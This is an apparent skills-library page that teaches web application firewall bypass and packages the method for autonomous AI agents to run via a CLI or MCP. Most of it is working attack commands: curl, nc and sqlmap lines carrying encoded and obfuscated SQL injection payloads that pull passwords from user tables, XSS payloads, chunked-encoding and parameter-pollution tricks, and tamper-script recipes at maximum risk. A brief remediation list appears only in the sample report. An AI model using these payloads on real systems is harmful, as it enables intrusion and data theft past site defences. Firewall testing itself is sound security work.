CG
SkillsPerforming Web Application Firewall Bypass
Start Free
Back to Skills Library
Application Security๐Ÿ”ด Advanced

Performing Web Application Firewall Bypass

Bypass Web Application Firewall protections using encoding techniques, HTTP method manipulation, parameter pollution, and payload obfuscation to deliver SQL injection, XSS, and other attack payloads past WAF detection rules.

5 min read7 code examples

Prerequisites

  • Burp Suite Professional with SQLMap integration
  • wafw00f for WAF fingerprinting and identification
  • SQLMap with tamper scripts for automated WAF bypass
  • Understanding of WAF detection mechanisms (signature, regex, behavioral)
  • Collection of encoding and obfuscation techniques per attack type
  • Knowledge of HTTP protocol nuances exploitable for evasion

Performing Web Application Firewall Bypass

When to Use

  • When confirmed vulnerabilities are blocked by WAF signature-based detection
  • During penetration testing where WAF prevents exploitation of known issues
  • When evaluating WAF rule effectiveness against evasion techniques
  • During red team engagements requiring bypass of perimeter security controls
  • When testing custom WAF rules for completeness and bypass resistance

Prerequisites

  • Burp Suite Professional with SQLMap integration
  • wafw00f for WAF fingerprinting and identification
  • SQLMap with tamper scripts for automated WAF bypass
  • Understanding of WAF detection mechanisms (signature, regex, behavioral)
  • Collection of encoding and obfuscation techniques per attack type
  • Knowledge of HTTP protocol nuances exploitable for evasion

Workflow

Step 1 โ€” Identify and Fingerprint the WAF

# Detect WAF using wafw00f
wafw00f http://target.com

# Manual WAF detection via response headers
curl -sI http://target.com | grep -iE "x-cdn|server|x-powered-by|x-sucuri|cf-ray|x-akamai"

# Trigger WAF with known bad payload and analyze response
curl "http://target.com/page?id=1' OR 1=1--" -v
# Look for: 403 Forbidden, custom block page, CAPTCHA challenge

# Common WAF indicators:
# Cloudflare: cf-ray header, __cfduid cookie
# AWS WAF: x-amzn-requestid
# ModSecurity: Mod_Security or OWASP CRS error messages
# Akamai: AkamaiGHost header
# Imperva: incap_ses cookie, visid_incap cookie

Step 2 โ€” Bypass with Encoding and Obfuscation

# URL encoding bypass
curl "http://target.com/page?id=1%27%20OR%201%3D1--"

# Double URL encoding
curl "http://target.com/page?id=1%2527%2520OR%25201%253D1--"

# Unicode encoding
curl "http://target.com/page?id=1%u0027%u0020OR%u00201%u003D1--"

# HTML entity encoding in body
curl -X POST http://target.com/search \
  -d "q=<script>alert&#40;1&#41;</script>"

# Mixed case SQL keywords
curl "http://target.com/page?id=1' UnIoN SeLeCt password FrOm users--"

# Inline comments between SQL keywords
curl "http://target.com/page?id=1'/*!UNION*//*!SELECT*/password/*!FROM*/users--"

# MySQL version-specific comments
curl "http://target.com/page?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--"

# Null bytes
curl "http://target.com/page?id=1'%00 OR 1=1--"

# Tab and newline substitution for spaces
curl "http://target.com/page?id=1'%09UNION%0ASELECT%0D1,2,3--"

Step 3 โ€” Bypass with HTTP Method and Protocol Tricks

# Change HTTP method (WAFs may only inspect GET/POST)
curl -X PUT "http://target.com/page?id=1' OR 1=1--"
curl -X PATCH "http://target.com/page" -d "id=1' OR 1=1--"

# Use HTTP/0.9 (no headers)
printf "GET /page?id=1' OR 1=1-- \r\n" | nc target.com 80

# Content-Type manipulation
curl -X POST http://target.com/page \
  -H "Content-Type: application/x-www-form-urlencoded; charset=ibm037" \
  -d "id=1' OR 1=1--"

# Multipart form data (may bypass body inspection)
curl -X POST http://target.com/page \
  -F "id=1' OR 1=1--"

# Chunked Transfer-Encoding
printf "POST /page HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\n\r\n4\r\nid=1\r\n11\r\n' OR 1=1--\r\n0\r\n\r\n" | nc target.com 80

# Parameter in unusual locations
curl http://target.com/page -H "X-Forwarded-For: 1' OR 1=1--"
curl http://target.com/page -H "Referer: http://target.com/page?id=1' OR 1=1--"

Step 4 โ€” Bypass with Payload Splitting and HPP

# HTTP Parameter Pollution
curl "http://target.com/page?id=1' UNION&id=SELECT password FROM users--"

# Split payload across parameters
curl "http://target.com/page?id=1'/*&q=*/UNION SELECT 1,2,3--"

# JSON-based SQLi (many WAFs miss JSON payloads)
curl -X POST http://target.com/api/query \
  -H "Content-Type: application/json" \
  -d '{"id": "1 AND 1=1 UNION SELECT password FROM users"}'

# JSON SQL injection with operators
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt":"", "$where":"1==1"}}'

# XML-wrapped payloads
curl -X POST http://target.com/api/data \
  -H "Content-Type: application/xml" \
  -d "<data><id>1' UNION SELECT password FROM users--</id></data>"

Step 5 โ€” Use SQLMap Tamper Scripts

# SQLMap with built-in tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase,space2comment

# Common tamper scripts for WAF bypass:
sqlmap -u "http://target.com/page?id=1" --tamper=charunicodeencode
sqlmap -u "http://target.com/page?id=1" --tamper=space2mssqlhash
sqlmap -u "http://target.com/page?id=1" --tamper=percentage
sqlmap -u "http://target.com/page?id=1" --tamper=chardoubleencode,between

# Multiple tamper scripts combined
sqlmap -u "http://target.com/page?id=1" \
  --tamper=randomcase,space2comment,between,charunicodeencode \
  --random-agent --level 5 --risk 3

# Custom WAF bypass profile
sqlmap -u "http://target.com/page?id=1" \
  --tamper=space2comment,randomcase \
  --delay=2 --random-agent \
  --technique=B --batch

Step 6 โ€” XSS WAF Bypass Techniques

# Case variation
curl "http://target.com/page?q=<ScRiPt>alert(1)</ScRiPt>"

# Event handler alternatives
curl "http://target.com/page?q=<img src=x oNerRor=alert(1)>"
curl "http://target.com/page?q=<svg/onload=alert(1)>"
curl "http://target.com/page?q=<body onpageshow=alert(1)>"
curl "http://target.com/page?q=<marquee onstart=alert(1)>"

# JavaScript URI scheme
curl "http://target.com/page?q=<a href=javascript:alert(1)>click</a>"

# Template literal syntax
curl "http://target.com/page?q=<script>alert\x601\x60</script>"

# Concatenation-based bypass
curl "http://target.com/page?q=<script>al\u0065rt(1)</script>"

# HTML encoding within attributes
curl "http://target.com/page?q=<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>"

# Double encoding
curl "http://target.com/page?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E"

Key Concepts

ConceptDescription
Signature EvasionObfuscating payloads to avoid matching WAF regex patterns
Encoding BypassUsing URL, Unicode, or HTML encoding to disguise malicious characters
Protocol-Level BypassExploiting HTTP protocol features (chunked encoding, method override)
Tamper ScriptsSQLMap modules that transform payloads to evade specific WAF rules
Content-Type ConfusionSending payloads in unexpected content types the WAF does not inspect
Parameter PollutionSplitting payloads across duplicate parameters to evade per-parameter inspection
Behavioral vs SignatureWAF detection modes: pattern matching (bypassable) vs. anomaly detection (harder)

Tools & Systems

ToolPurpose
wafw00fWAF fingerprinting and identification
SQLMapAutomated SQL injection with WAF bypass tamper scripts
waf-bypass.comCommunity-maintained WAF bypass payload database
Awesome-WAFCurated GitHub repository of WAF bypass techniques
Burp SuiteHTTP proxy for manual payload crafting and WAF response analysis
XSStrikeXSS scanner with WAF detection and bypass capabilities

Common Scenarios

  1. SQLi Through JSON โ€” Bypass WAF by sending SQL injection payloads inside JSON request bodies that are not inspected by the WAF rules
  2. XSS via Event Handlers โ€” Use alternative HTML event handlers (onpageshow, onanimationstart) not covered by WAF signature rules
  3. Encoding Chain Bypass โ€” Apply multiple layers of encoding (URL + Unicode + HTML entity) to evade each decoding layer of the WAF
  4. Chunked Transfer Bypass โ€” Split malicious payload across HTTP chunked transfer encoding segments to avoid pattern matching
  5. Method Override โ€” Send attack payloads via PUT/PATCH methods or custom headers that WAF does not inspect

Output Format

## WAF Bypass Assessment Report
- **Target**: http://target.com
- **WAF Identified**: Cloudflare (via cf-ray header)
- **Bypass Achieved**: Yes

### WAF Detection Results
| Payload Type | Blocked | Bypass Found |
|-------------|---------|-------------|
| Basic SQLi | Yes | Yes (JSON encoding) |
| UNION SELECT | Yes | Yes (inline comments) |
| XSS <script> | Yes | Yes (SVG onload) |
| Path Traversal | No | N/A (not blocked) |

### Successful Bypass Payloads
| # | Original (Blocked) | Bypass Payload | Technique |
|---|-------------------|---------------|-----------|
| 1 | 1' OR 1=1-- | {"id":"1' OR 1=1--"} | JSON content-type |
| 2 | UNION SELECT | /*!50000UNION*/ /*!50000SELECT*/ | MySQL version comments |
| 3 | <script>alert(1)</script> | <svg/onload=alert(1)> | Alternative tag+event |

### Remediation
- Enable JSON body inspection in WAF rules
- Implement behavioral analysis alongside signature detection
- Add rules for uncommon HTML tags and event handlers
- Enable deep content inspection for all HTTP methods
- Implement request normalization before rule evaluation

Verification Criteria

Confirm successful execution by validating:

  • [ ] All prerequisite tools and access requirements are satisfied
  • [ ] Each workflow step completed without errors
  • [ ] Output matches expected format and contains expected data
  • [ ] No security warnings or misconfigurations detected
  • [ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC6.1 (Logical Access), CC8.1 (Change Management)
  • ISO 27001: A.14.2 (Secure Development), A.14.1 (Security Requirements)
  • NIST 800-53: SA-11 (Developer Testing), SI-10 (Input Validation), SC-18 (Mobile Code)
  • OWASP LLM Top 10: LLM01 (Prompt Injection), LLM02 (Insecure Output)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

# Install via CLI
npx claw-grc skills add performing-web-application-firewall-bypass

# Or load dynamically via MCP
grc.load_skill("performing-web-application-firewall-bypass")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact โ€” successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Use with Claw GRC Agents

This skill is fully compatible with Claw GRC's autonomous agent system. Deploy it to any registered agent via MCP, and every execution will be logged in the tamper-evident audit trail.

// Load this skill in your agent
npx claw-grc skills add performing-web-application-firewall-bypass
// Or via MCP
grc.load_skill("performing-web-application-firewall-bypass")

Tags

waf-bypasswaf-evasionsql-injectionxsspayload-obfuscationencoding-bypassweb-security

Related Skills

Application Security

Exploiting SQL Injection with Sqlmap

5mยทadvanced
Application Security

Performing Second Order SQL Injection

5mยทadvanced
Application Security

Performing HTTP Parameter Pollution Attack

4mยทintermediate
Application Security

Testing for XSS Vulnerabilities with Burpsuite

7mยทintermediate
Application Security

Exploiting HTTP Request Smuggling

7mยทadvanced
Application Security

Exploiting IDOR Vulnerabilities

7mยทadvanced

Skill Details

Domain
Application Security
Difficulty
advanced
Read Time
5 min
Code Examples
7

On This Page

When to UsePrerequisitesWorkflowKey ConceptsTools & SystemsCommon ScenariosOutput FormatWAF Bypass Assessment ReportVerification CriteriaCompliance Framework MappingDeploying This Skill with Claw GRC

Deploy This Skill

Add this skill to your Claw GRC agent and start automating.

Get Started Free โ†’